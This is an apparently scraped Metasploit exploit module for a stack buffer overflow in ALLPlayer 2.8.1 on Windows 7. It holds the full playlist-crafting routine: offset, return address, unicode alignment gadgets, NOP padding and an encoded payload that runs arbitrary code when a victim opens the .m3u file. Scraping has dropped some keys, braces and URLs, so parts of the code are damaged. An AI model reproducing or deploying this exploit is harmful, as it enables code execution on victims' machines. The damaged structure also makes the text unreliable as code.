ALLPlayer – ‘.m3u’ Local Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2014-03-05
  • 类别:
  • 来源:
  • ##
    # This module requires Metasploit: http//
    # Current source:
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::FILEFORMAT
    def initialize(info = {})
    'Name' => 'ALLPlayer M3U Buffer Overflow',
    'Description'=> %q{
    This module exploits a stack-based buffer overflow vulnerability in
    ALLPlayer 2.8.1, caused by a long string in a playlist entry.
    By persuading the victim to open a specially-crafted .M3U file, a
    remote attacker could execute arbitrary code on the system or cause
    the application to crash. This module has been tested successfully on
    Windows 7 SP1.
    'License'=> MSF_LICENSE,
    'Author' =>
    'metacom',# Vulnerability discovery
    'Mike Czumak',# Original exploit
    'Gabor Seljan'# Metasploit module
    'References' =>
    [ 'BID', '62926' ],
    [ 'BID', '63896' ],
    [ 'EDB', '28855' ],
    [ 'EDB', '29549' ],
    [ 'EDB', '29798' ],
    [ 'EDB', '32041' ],
    [ 'OSVDB', '98283' ],
    [ 'URL', '' ]
    'DefaultOptions' =>
    'ExitFunction' => 'process'
    'Platform' => 'win',
    'DisableNops'=> true,
    'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
    'Space'=> 3060,
    'EncoderType'=> Msf::Encoder::Type::AlphanumUnicodeMixed,
    'EncoderOptions' =>
    'BufferRegister' => 'EAX'
    [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
    'Offset' => 301,
    'Ret'=> "\x50\x45",# POP POP RET from ALLPlayer.exe
    'Nop'=> "\x6e" # ADD BYTE PTR DS:[ESI],CH
    'Privileged' => false,
    'DisclosureDate' => 'Oct 09 2013',
    'DefaultTarget'=> 0))
    ['FILENAME', [ false, 'The file name.', 'msf.m3u'])
    def exploit
    nop = target['Nop']
    sploit =rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50"# POPAD
    sploit << target.ret
    sploit << "\x53"# PUSH EBX
    sploit << nop
    sploit << "\x58"# POP EAX
    sploit << nop
    sploit << "\x05\x14\x11"# ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11"# SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50"# PUSH EAX
    sploit << nop
    sploit << "\xc3"# RET
    sploit << nop * 109
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception
    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)